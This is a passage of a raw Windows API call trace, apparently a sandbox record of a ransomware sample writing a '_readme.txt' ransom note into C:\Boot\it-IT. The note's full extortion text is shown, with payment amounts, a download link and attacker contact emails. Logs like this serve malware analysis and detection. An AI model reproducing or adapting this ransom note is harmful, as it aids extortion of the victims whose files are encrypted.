hHeap=0x2c0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.713] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.713] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.713] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.713] PathFindFileNameW (pszPath="") returned="" [0173.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.713] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.714] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.714] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.714] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8ca68 [0173.714] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0173.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.715] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0173.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.715] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.715] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.715] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 